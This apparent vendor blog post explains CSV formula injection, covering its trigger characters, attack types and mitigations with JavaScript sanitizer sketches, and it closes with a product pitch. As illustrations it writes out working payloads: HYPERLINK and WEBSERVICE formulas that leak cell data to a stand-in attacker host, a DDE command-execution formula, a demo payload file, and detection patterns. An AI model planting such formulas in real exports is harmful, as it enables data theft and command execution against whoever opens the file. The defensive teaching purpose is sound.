Why That Innocent CSV Export Can Pop a Calculator (CSV Injection, Explained)
Published on May 20, 2026 by The Kestrel Tools Team • 9 min read
A pen tester opens last week’s analytics export. The first thing on screen is a Calculator window. Nobody clicked anything, nobody ran a macro — they double-clicked a .csv file your service generated and Excel quietly executed a formula that lived inside one of the cells. Welcome to CSV formula injection: a vulnerability so understated that most exporters ship with it on day one and most security reviewers find it by accident.
The mechanism is brutally small. If a CSV cell starts with =, +, -, or @, Excel, Google Sheets, and LibreOffice Calc treat the cell as a formula instead of a string. That formula can call HYPERLINK, WEBSERVICE, IMPORTXML, or — in older Excel — invoke cmd.exe through DDE. Your CSV stopped being data the moment a spreadsheet opened it.
This post walks through what CSV injection actually does, why the four trigger characters matter, the three real fixes (and one popular fix that’s wrong more often than people realize), and the threat-model question that decides which fix you should ship.
What is CSV formula injection?
CSV formula injection (also called CSV injection or formula injection) is a vulnerability where a CSV file contains a cell beginning with a formula trigger character — =, +, -, or @ — and a spreadsheet application interprets that cell as an executable formula instead of a literal string. The risk surfaces when untrusted user input is written into a CSV that another user later opens in Excel, Google Sheets, or LibreOffice Calc.
The canonical bug report is straight out of an OWASP cheat sheet, but the reason it keeps happening is more interesting: nobody escaping CSVs treats them as code. They’re “just data.” The CSV format itself — RFC 4180 — says nothing about formulas. The vulnerability is created entirely by the spreadsheet’s interpretation of the file, which means the data and the threat model live in different layers and most teams only own one of them.
A minimum reproducible example is two lines:
name,note
Alice,=1+1
Open that in Excel or Sheets. The second cell renders as 2, not =1+1. You’ve just confirmed your spreadsheet evaluates strings that start with =. From here it’s a short walk to weaponized payloads.
The four trigger characters (and why they each matter)
Most write-ups mention =. The full set is four characters, and skipping any of them leaves a working bypass.
- Equals sign (=): the obvious one. =1+1, =SUM(A1:A10), =HYPERLINK(...).
- Plus sign (+): Excel and Sheets accept +1+1 as a formula. Same evaluation path as =.
- Minus sign (-): -1+1 is also treated as a formula, because spreadsheets parse a leading minus as the start of a numeric expression that resolves through the formula engine.
- At sign (@): Excel uses @ as the implicit-intersection operator (introduced with dynamic arrays in Office 365). A cell starting with @SUM(A1:A10) evaluates as a formula in current Excel.
There’s a fifth case worth knowing about even if it’s not strictly a leading character: tab and carriage-return prefixes. A cell starting with \t (a literal tab) is rendered as a tab in Excel and is not treated as a formula — which is exactly why one of the recommended sanitization patterns prepends a tab. The same is true of leading whitespace, but only on certain spreadsheet versions, so leading-space sanitization is unreliable.
If your sanitizer only checks for =, an attacker drops a + and you’re back to square one. The check has to be all four.
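The all-four check can be sketched as a small predicate. This is a minimal sketch rather than a vetted sanitizer: the names FORMULA_TRIGGERS and startsWithFormulaTrigger are hypothetical, and it only inspects the first character of string values.

```javascript
// Hypothetical helper: the four trigger characters listed above.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@']);

// Returns true when a string cell begins with any trigger character.
// Non-string values (numbers, null, booleans) are never flagged.
function startsWithFormulaTrigger(value) {
  return typeof value === 'string'
    && value.length > 0
    && FORMULA_TRIGGERS.has(value[0]);
}

const samples = ['=1+1', '+2+2', '-3+3', '@SUM(1, 1)', 'Alice', '', 42];
const flagged = samples.filter(startsWithFormulaTrigger);
console.log(flagged); // the four formula-leading samples
```

Note that a harmless string such as "-42" is flagged too. A first-character check can't tell a negative number from a payload, which is part of why sanitizing has a data cost.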
What can an attacker actually do?
The set of formula functions is wide, but four show up in real exploits.
1. Data exfiltration via HYPERLINK. A cell containing =HYPERLINK("https://attacker.example/?leak="&A1, "Click for report") looks like a normal link. When the victim clicks it, the link is constructed at click-time using whatever value lives in A1 — which might be a customer email, an order ID, or a session token if the export contains one. The exfiltration happens through a click the user thinks is benign.
2. Data exfiltration via WEBSERVICE / IMPORTXML. Excel’s WEBSERVICE(url) and Google Sheets’ IMPORTXML(url, xpath) make HTTP requests automatically when the cell is recalculated. No click required. A payload like =WEBSERVICE("https://attacker.example/?leak="&A1) sends the contents of A1 to the attacker on first open, and again every time the sheet recalculates. Modern Excel prompts before allowing external data connections, but the prompt is dismissible and many users click through.
3. Command execution via DDE (legacy Excel). The historical worst case is =cmd|'/c calc'!A1, which opens Calculator on Windows via Dynamic Data Exchange. Microsoft disabled DDE auto-execution by default in Office security updates released in 2017, and the prompt today is a hard blocker, not a dismissible warning. Even so, unpatched fleets, locked-down kiosks with weird configurations, and corporate Excel installations with old policies still trip on this. Threat-model accordingly.
4. Cross-site request forgery via IMPORTXML. If the victim is logged into an internal service and opens a malicious CSV in Sheets, an IMPORTXML call to an internal URL can issue a request with their session cookie. This is the spreadsheet-flavored version of classic CSRF, and it’s the reason internal admin exports are a higher-risk surface than they look.
Note what’s missing from this list: silent code execution on first open in modern Excel or Sheets. Both prompt before fetching external data or running DDE. The vulnerability isn’t “open a CSV, get owned” — it’s “open a CSV, get phished or exfiltrated through a believable-looking interaction.”
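When reviewing an export, it can help to label what a formula-leading cell appears to be attempting. The sketch below is a rough triage heuristic, not a detection engine: classifyCell, PAYLOAD_PATTERNS, and the label names are all hypothetical, and the patterns only cover the four payload families described above.

```javascript
// Hypothetical triage helper. The patterns are illustrative heuristics,
// not a complete list of dangerous spreadsheet functions.
const PAYLOAD_PATTERNS = [
  { label: 'dde-command', pattern: /^[=+\-@]\s*\w+\|.*!/ },
  { label: 'auto-fetch', pattern: /\b(WEBSERVICE|IMPORTXML)\s*\(/i },
  { label: 'click-exfiltration', pattern: /\bHYPERLINK\s*\(/i },
];

// Labels a cell by the first matching pattern, in the order listed above.
function classifyCell(value) {
  if (typeof value !== 'string' || !/^[=+\-@]/.test(value)) {
    return 'not-a-formula';
  }
  const hit = PAYLOAD_PATTERNS.find(({ pattern }) => pattern.test(value));
  return hit ? hit.label : 'other-formula';
}

console.log(classifyCell("=cmd|'/c calc'!A1"));
console.log(classifyCell('=WEBSERVICE("https://attacker.example/?leak="&A1)'));
console.log(classifyCell('=HYPERLINK("https://attacker.example/", "Click")'));
console.log(classifyCell('=1+1'));
```

A label like this is only useful for prioritizing review. Whether a cell is dangerous is still decided by the spreadsheet that opens it, so classification is no substitute for sanitizing.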
How to prevent CSV injection
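Two in-file fixes actually work, listed in the order I’d reach for them, followed by a third pattern you’ll find in legacy code and should remove. (The third workable fix, generating .xlsx instead of CSV, comes up in the threat-model section.)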
1. Prefix dangerous cells with a single quote (') — the OWASP recommendation
The OWASP CSV injection cheat sheet recommends prepending a single quote to any cell whose first character is =, +, -, or @. The quote tells Excel and Sheets to treat the cell as text.
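// Prefix formula-leading string cells with an apostrophe so spreadsheets read them as text.
function sanitizeCell(value) {
  // Leave numbers, booleans, null, and undefined untouched.
  if (typeof value !== 'string') return value;
  // The four trigger characters, plus tab and carriage return.
  if (/^[=+\-@\t\r]/.test(value)) {
    return "'" + value;
  }
  return value;
}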
Pros: One-line fix. Works in Excel, Sheets, and LibreOffice. No CSV-format weirdness for downstream consumers.
Cons — and they’re real: The leading apostrophe is visible in some viewers and is part of the cell content in some non-spreadsheet CSV consumers. If a downstream pipeline parses your CSV with a generic CSV reader (Python’s csv, pandas.read_csv, etc.), it’ll see the apostrophe as data. This breaks reconciliation jobs, data archives, and any analytics flow that consumes the same CSV without re-processing it. It also looks weird to humans who skim the raw file.
Use this when the CSV’s exclusive consumer is a spreadsheet UI (Excel, Sheets, Numbers, LibreOffice).
2. Prefix dangerous cells with a tab (\t)
A leading tab character also forces text mode in Excel and Sheets, and unlike the apostrophe it survives the round trip more cleanly in most CSV parsers (the tab stays as data but doesn’t visually corrupt the value the same way).
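// Prefix formula-leading string cells with a tab so spreadsheets read them as text.
function sanitizeCell(value) {
  // Leave numbers, booleans, null, and undefined untouched.
  if (typeof value !== 'string') return value;
  // The four trigger characters, plus tab and carriage return.
  if (/^[=+\-@\t\r]/.test(value)) {
    return '\t' + value;
  }
  return value;
}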
Pros: Less visually disruptive than '. Spreadsheets render the tab as whitespace, not as a glyph.
Cons: Your data now has a leading tab everywhere a formula trigger would have been. A tab is whitespace, so any downstream consumer that trims values on read strips it and puts the trigger character right back at the front. You’ve shifted the problem.
Use this when you need a less visible fix and you control — or trust — the downstream consumers.
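The trim-on-read problem is easy to reproduce. This is a minimal sketch: sanitizeWithTab is a hypothetical name for the tab-prefix approach, and the downstream consumer is simulated with a plain String.prototype.trim() call.

```javascript
// Tab-prefix sanitizer (option 2 above), under a hypothetical name.
function sanitizeWithTab(value) {
  if (typeof value !== 'string') return value;
  return /^[=+\-@\t\r]/.test(value) ? '\t' + value : value;
}

const stored = sanitizeWithTab('=1+1');

// Simulated downstream consumer that trims whitespace on read.
const afterTrim = stored.trim();

console.log(JSON.stringify(stored));    // "\t=1+1"
console.log(JSON.stringify(afterTrim)); // "=1+1"
```

If any hop between your exporter and the spreadsheet trims values, the tab prefix protects nothing, which is why this option depends on knowing your consumers.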
3. Wrap the cell value in an Excel text directive (="...") (spreadsheet-specific, not recommended)
For exports specifically targeted at Excel, you can serialize formula-leading cells with the spreadsheet’s text-format directive: wrapping the value as ="..." forces text mode in some Excel versions, but it behaves inconsistently across viewers and platforms. Don’t use this. It’s documented in older blog posts and almost always introduces new bugs.
I mention it only so you can recognize and remove it from legacy code.
The fix that doesn’t work: “just escape commas and quotes”
A surprising number of CSV libraries describe themselves as “injection-safe” because they correctly escape commas, quotes, and newlines per RFC 4180. They are not injection-safe. RFC 4180 escaping is about parsing — making sure a CSV reader correctly reconstructs the string Smith, John when it appears inside one cell. Formula injection is about interpretation by a spreadsheet, which happens after the parser already returned the right string.
If you read a CSV library’s docs and the word “formula” doesn’t appear, assume it doesn’t sanitize for injection. You’ll need to do that yourself, before serialization or as a post-process.
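The gap between escaping and sanitizing is easier to see side by side. The sketch below assumes a hand-rolled writer: escapeField and toCsvRow are hypothetical names, not any library’s API, and sanitizeCell is the apostrophe-prefix approach from earlier. It sanitizes each cell first and applies RFC 4180-style quoting second.

```javascript
// RFC 4180-style quoting: wrap the field in double quotes when it contains
// a comma, double quote, CR, or LF, and double any embedded quotes.
function escapeField(text) {
  return /[",\r\n]/.test(text) ? '"' + text.replace(/"/g, '""') + '"' : text;
}

// Apostrophe-prefix sanitizer (option 1 above).
function sanitizeCell(value) {
  if (typeof value !== 'string') return value;
  return /^[=+\-@\t\r]/.test(value) ? "'" + value : value;
}

// Hypothetical row writer: sanitize first (optionally), then quote.
function toCsvRow(cells, { sanitize }) {
  return cells
    .map((cell) => (sanitize ? sanitizeCell(cell) : cell))
    .map((cell) => escapeField(String(cell ?? '')))
    .join(',');
}

const row = ['Eve', '=HYPERLINK("https://attacker.example/", "Click")'];
console.log(toCsvRow(row, { sanitize: false }));
console.log(toCsvRow(row, { sanitize: true }));
```

The first line of output is perfectly valid CSV, and a parser will hand back a cell that still starts with =. Only the second line changes what the spreadsheet sees.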
The threat-model question: should you sanitize at all?
Here’s the part most write-ups skip. Sanitization mutates your data. That might not be the right call.
Three common consumer profiles, three different right answers:
- The CSV is opened by humans in Excel/Sheets. Sanitize. The user-facing risk dwarfs the data-purity cost. Apply prefix-with-' (option 1) and document it.
- The CSV is a raw-data archive consumed only by automated pipelines. Don’t sanitize. Adding a leading ' to every formula-leading cell pollutes your dataset. Anyone running analytics over the archive has to know to strip it. Instead, document the file as machine-only and prevent it from being opened in a spreadsheet (e.g., serve it with Content-Disposition: attachment; filename="export.tsv" and use a non-spreadsheet extension).
- The CSV is mixed-use: humans sometimes spot-check it, automation usually consumes it. This is where most teams live, and it’s where the fix has to be context-aware. Generate two files: a sanitized export.csv for spreadsheet consumption, and an unsanitized export.raw.csv for the data pipeline. Or generate .xlsx directly with a proper writer that doesn’t have this problem (the .xlsx format encodes formulas explicitly, so a string is unambiguously a string).
The right answer depends on who’s downstream. “Just sanitize on output” is incomplete advice because it assumes one consumer.
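For the mixed-use case, the two-artifact approach might look like the sketch below. It is one possible shape under stated assumptions: buildExports and serialize are hypothetical names, the rows are already in memory as arrays, and writing the files to disk or a response is left out.

```javascript
// Apostrophe-prefix sanitizer (option 1 above).
function sanitizeCell(value) {
  if (typeof value !== 'string') return value;
  return /^[=+\-@\t\r]/.test(value) ? "'" + value : value;
}

// RFC 4180-style quoting for a single field.
function escapeField(text) {
  return /[",\r\n]/.test(text) ? '"' + text.replace(/"/g, '""') + '"' : text;
}

// Serialize rows, passing every cell through `transform` before quoting.
function serialize(rows, transform) {
  return rows
    .map((row) => row.map((cell) => escapeField(String(transform(cell) ?? ''))).join(','))
    .join('\r\n') + '\r\n';
}

// Hypothetical entry point: returns file name -> file contents.
function buildExports(rows) {
  return {
    'export.csv': serialize(rows, sanitizeCell),       // for spreadsheets
    'export.raw.csv': serialize(rows, (cell) => cell), // for pipelines
  };
}

const files = buildExports([
  ['name', 'note'],
  ['Alice', '=1+1'],
  ['Bob', '-42'],
]);
console.log(JSON.stringify(files['export.csv']));
console.log(JSON.stringify(files['export.raw.csv']));
```

The raw file keeps -42 intact for the pipeline, while the spreadsheet copy carries the apostrophe. Both come from the same rows, so they can’t drift apart.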
A hands-on demonstration in 60 seconds
Save this as payload.csv and open it in Google Sheets:
name,formula
Alice,=1+1
Bob,+2+2
Carol,-3+3
Dave,"@SUM(1, 1)"
Eve,"=HYPERLINK(""https://example.com/?id=""&A1, ""Click here"")"
Four cells render as numbers (2, 4, 0, 2). The fifth renders as a clickable link whose URL is built at click time using the value in A1 — which Sheets has helpfully concatenated for you. That’s the entire vulnerability. Five lines, every flavor on display.
Now paste the same payload into a client-side CSV/JSON converter and watch what the converter does with it. A privacy-respecting tool keeps the cells exactly as you typed them, because mutation isn’t its job — it’s a converter, not a sanitizer. That’s the right behavior for a general-purpose tool, and it’s a useful diagnostic: if you paste in a known-malicious CSV and the output is byte-identical, you have an authentic copy of the data and can decide yourself whether to sanitize it for the next step.
A quick word on BOMs and non-ASCII CSVs
A tangent worth knowing about because it shows up in the same code paths: if your CSV contains non-ASCII characters (é, 中, emoji), Excel on Windows guesses the encoding from the byte order mark (BOM). No BOM, and Excel guesses Windows-1252, which mangles UTF-8. The fix is to write a UTF-8 BOM (\xEF\xBB\xBF) at the start of the file. This isn’t a security issue, but it’s adjacent to the sanitization step in your CSV writer and easy to forget. If your exports look fine in your browser and broken in Excel, the BOM is missing.
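Adding the BOM is a one-liner in most writers. The sketch below assumes you build the CSV as a string and encode it as UTF-8 yourself; withBom is a hypothetical helper name, and TextEncoder is the standard encoder available in browsers and current Node.js.

```javascript
// U+FEFF encodes to the three bytes EF BB BF in UTF-8.
const UTF8_BOM = '\uFEFF';

// Prepend the BOM once; calling this twice does not double it.
function withBom(csvText) {
  return csvText.startsWith(UTF8_BOM) ? csvText : UTF8_BOM + csvText;
}

const bytes = new TextEncoder().encode(withBom('name\r\ncafé\r\n'));
console.log(Array.from(bytes.slice(0, 3), (b) => b.toString(16)));
```

Keep in mind that the BOM becomes part of the file. Non-spreadsheet consumers may see it as an invisible character glued to the first header name unless they strip it.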
Common questions, answered concisely
Is CSV injection a CVE-class vulnerability? It’s tracked as CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). Whether it gets a CVE depends on the application; many bug bounty programs accept it as a valid finding when an admin user can be tricked into opening a malicious export.
Does generating .xlsx directly avoid the problem? Yes, if the writer encodes formulas explicitly. Excel’s .xlsx format uses an XML schema that distinguishes a string cell (<c t="s">) from a formula cell (<c><f>...</f></c>), so a string can’t accidentally become a formula. Libraries like openpyxl (Python), exceljs (Node), and Apache POI (Java) get this right by default.
What about TSV (tab-separated values)? Same vulnerability. Excel and Sheets evaluate formula triggers regardless of the field separator. Sanitize the same way.
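Does Google Sheets have a setting to disable formula evaluation on import? Not one you can rely on as the exporter. The import dialog has a “Convert text to numbers, dates, and formulas” checkbox, but it’s controlled by whoever opens the file, not by you. Your only dependable mitigation is at the source.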
Is =cmd|'/c calc'!A1 still exploitable? Only on Excel installations with DDE auto-execution enabled, which has been off-by-default since 2017 patches. Treat it as a residual risk for unpatched fleets and as a pen-test reproducer that still works in some environments.
The takeaway
CSV injection isn’t a CSV bug — it’s a spreadsheet bug that the CSV format hands the keys to. Any cell starting with =, +, -, or @ becomes a formula in Excel, Sheets, and LibreOffice. The exploits that matter today are data exfiltration through HYPERLINK, WEBSERVICE, and IMPORTXML; the legacy DDE command-execution path still works on unpatched Office.
Three workable fixes:
- Prepend ' to dangerous cells. OWASP’s recommendation. One line. Visible in some downstream consumers.
- Prepend \t to dangerous cells. Less visually disruptive. Trim-on-read can re-expose the trigger.
- Generate .xlsx directly. Avoids the problem entirely; formulas and strings live in different XML elements.
And one decision your sanitizer can’t make for you: who reads this file? If it’s a human in a spreadsheet, sanitize. If it’s an automated pipeline, document the file as machine-only and don’t mutate the data. If it’s both, ship two artifacts.
If you want a no-tracking, no-upload sandbox to inspect a suspicious export before it ships, paste it into Kestrel Tools — the converter runs entirely client-side, leaves your data unmodified, and lets you eyeball formula-leading cells before they reach a spreadsheet.